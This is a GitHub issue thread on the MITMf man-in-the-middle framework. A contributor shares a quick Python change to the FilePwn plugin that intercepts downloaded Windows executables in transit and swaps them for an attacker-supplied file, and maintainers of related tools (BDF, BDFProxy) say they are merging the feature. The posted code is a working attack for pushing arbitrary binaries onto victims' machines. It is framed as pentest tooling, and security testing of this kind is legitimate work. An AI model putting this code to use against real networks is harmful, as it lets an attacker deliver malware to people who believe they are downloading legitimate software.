### ISSUE TITLE
FilePwn replace file

### ISSUE THREAD

**Issue by DarkPringles** [byt3bl33d3r/MITMf#157]
I have made some modifications on the filepwn.py file that simply replace the binary file. I think it is a great feature to replace the downloaded file with another and can be very helpful to provide own code. As the filepwn plugin got some modification my "replacement feature" not take affect anymore. Is it possible to add a binary replacement option by default as a standalone feature without loading the metasploit stuff?

**Comment by secretsquirrel** [comment]
Please tell me about your modifications to filepwn.

**Comment by DarkPringles** [comment]
I needed this feature in a pentest so i edit the file in a quick and dirty style for Filetype exe ... 

  def serverResponse(self, response, request, data):

        content_header = response.headers['Content-Type']
        client_ip      = response.getClientIP()

        if content_header in self.binaryMimeTypes:
            for bintype in ['pe']:
                if self.bytes_have_format(data, bintype):
                    mitmf_logger.info("[FilePwn] {} Detected supported binary type ({})!".format(client_ip, bintype))
                    fd, tmpFile = mkstemp()
                    bd_binary = open(self.RFile, "rb").read()
                    mitmf_logger.info("[FilePwn] {} Replace complete, forwarding to client".format(client_ip))
                    return {'response': response, 'request': request, 'data': bd_binary}

        mitmf_logger.debug("[FilePwn] {} File is not of supported Content-Type: {}".format(client_ip, content_header))
        return {'response': response, 'request': request, 'data': data}

    def pluginOptions(self, options):
        options.add_argument("--RFile", type=str, help="Location of file to replace")

**Comment by byt3bl33d3r** [comment]
@DarkPringles hey! thanks for this ! i'll see if I can get these changes integrated into the plugin! Have to update the filepwn plugin anyway

**Comment by secretsquirrel** [comment]
The easiest place to add this would be in BDF directly... I could do it.

**Comment by byt3bl33d3r** [comment]
@secretsquirrel cool! thanks! :D

**Comment by DarkPringles** [comment]
@secretsquirrel nice, thanks for your help! please inform us about your process

**Comment by secretsquirrel** [comment]
Done:
https://github.com/secretsquirrel/the-backdoor-factory/commit/dadf1d21bfcb9c8ebefc7891bd95b9452b2af8d5

And done:
https://github.com/secretsquirrel/BDFProxy/commit/2e64720b72b59c5421187cb40a83bc44195bbefc

**Comment by byt3bl33d3r** [comment]
@secretsquirrel you the man! :P

**Comment by DarkPringles** [comment]
wow very nice! i will test it

**Comment by DarkPringles** [comment]
fantastic man! how is it implement in mitmf ?

**Comment by byt3bl33d3r** [comment]
@DarkPringles I'm updating the filepwn plugin as we speak , will be merged soon :+1:

**Comment by DarkPringles** [comment]
Thumbs up to you guys. Awesome tools!

**Comment by byt3bl33d3r** [comment]
@DarkPringles  @secretsquirrel  Done in 1a5c7c03b72d53d8fafa029cd61bbffc9c85cf53

**Comment by DarkPringles** [comment]
Well done. Working perfectly!
